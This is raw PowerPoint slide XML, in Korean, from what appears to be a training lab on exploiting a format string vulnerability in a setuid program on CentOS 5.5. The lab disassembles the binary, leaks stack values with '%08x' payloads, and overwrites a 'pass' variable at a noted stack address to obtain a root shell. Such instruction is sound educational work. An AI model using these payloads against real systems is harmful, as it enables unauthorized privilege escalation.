          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l heap</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648275"/>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09">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C217BE02-C249-4B5F-B814-9FDE58ECBC3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1699" t="2896"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530224" y="1327150"/>
            <a:ext cx="3932555" cy="695536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A268674-ACB5-47FC-8FAB-D5A054A14CE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1145" t="7026"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530224" y="2770129"/>
            <a:ext cx="3977321" cy="658871"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F01A300-EBE6-4B42-B0BD-D37242AA4775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2758136661"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317137" y="498209"/>
          <a:ext cx="4932807" cy="4393375"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="160444018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3504514"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="392925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활성화로는 대응이 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이유는 다음과 같이 두 버퍼들 간의 거리는 일정하게 유지되기 때문이다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311618"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61441" name="_x563165400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC678E34-4942-49FE-B9D0-0104EB14B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981" y="1252979"/>
            <a:ext cx="3870325" cy="3414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CAEABC-BB50-468C-9324-155014192660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5146484"/>
            <a:ext cx="5616792" cy="134251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40976954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루트 쉘을 획득하여라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값이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144</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되면 루트 쉘을 획득할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역어셈블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(CentOS5.5</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82109271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소스 파일 및 취약한 부분 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ vi </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사용으로 포맷 스트링 취약점이 존재함을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이면 루트 권한 쉘을 얻을 수 있음을 확인</a:t>
            </a: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ojdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disassemble </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 취약한 부분 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>M intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57FDDCC5-5EEB-4A7D-AA72-66E76071A90F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="529203" y="1308062"/>
            <a:ext cx="4970272" cy="2640330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55727F43-D33E-4A48-AFB1-B318A79B845C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6293899" y="481127"/>
            <a:ext cx="4970399" cy="2700528"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4965C47-8AF6-484B-821C-5976345E9ED4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="12552" r="353"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6315590" y="4046737"/>
            <a:ext cx="4927016" cy="2330136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7974144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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행</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a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>변수의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>0xbfffead0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>변수의 주소는 일부 변경될 수 있음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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수 조작 준비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   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>       "\xd0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"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x“’)</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%08x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>는 총 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>개임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>0xbfffeaa0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>명령행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 인자 길이에 따라 변경될 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A0EFEB4-AA1E-4B58-9FBC-FD9B7F5B1480}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3579448156"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="497191" y="442099"/>
          <a:ext cx="4009639" cy="4624509"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4009639">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3874176564"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="20016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134640343"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="415117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시점에서의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3499081"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63489" name="_x617086112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19D643E2-0914-4348-BAF3-4D3A333DB3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4" r="492" b="3080"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="682117" y="914402"/>
            <a:ext cx="3221974" cy="40949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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{908F26EA-D7C6-4555-AAE7-A403C095029D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497191" y="5536756"/>
            <a:ext cx="4935093" cy="653923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B1E0E57-DBFB-4883-AA1C-049CABDDFC22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3154929117"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6269429" y="442099"/>
          <a:ext cx="4932807" cy="4150233"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3594700888"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23050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0047818"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3881970">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6863989"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63491" name="_x617765528">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{918F0D9E-653E-406B-BAF4-FA91A13F8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944" y="954128"/>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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{408F8867-D6D3-4DBD-92F8-8F6CBA583609}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="1033" t="4059" r="833" b="3893"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6269429" y="5343526"/>
            <a:ext cx="4868292" cy="695326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7373323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1897A156-4D8D-4AC0-A570-59C6AB5495DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1342784323"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="487602"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argv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포함된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%08x’</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스택의 값을 하나씩 읽어온다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pic>
        <p:nvPicPr>
          <p:cNvPr id="66562" name="_x617086400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B2B15A9-8D12-412B-A71B-F57674F3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154"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66561" name="_x617086688">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07057C53-AA77-404F-B1EB-DB62815F0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08"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표 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2601F245-3D40-4C1F-8FEB-C8D2C9432FFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1950185702"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6284887"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24053029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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수 조작 시도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76</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 변경됨을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p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9C2C54A-5F0A-496C-967B-013EAF2B9B3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1461192320"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="488831" y="475102"/>
          <a:ext cx="5379232" cy="4158107"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5379232">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="25470910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1660690"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3911854">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024917"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67585" name="_x618891432">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CDE8608-6A28-4B63-89D9-FDF1DFFE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98" y="993484"/>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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D4CBBE-FD7A-4F02-AAEB-6ADC28FB1D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="488831" y="5331422"/>
            <a:ext cx="4982591" cy="723011"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53B88285-BDAF-4E0F-89EA-AE93331359EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="887382142"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317137" y="481834"/>
          <a:ext cx="5386032" cy="4164940"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5386032">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3481946896"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23268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78066711"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3918687">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9939432"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67587" name="_x1659517408">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39DFB036-1896-41D8-BB25-802AF9721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652" y="993484"/>
            <a:ext cx="4803775" cy="359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309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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
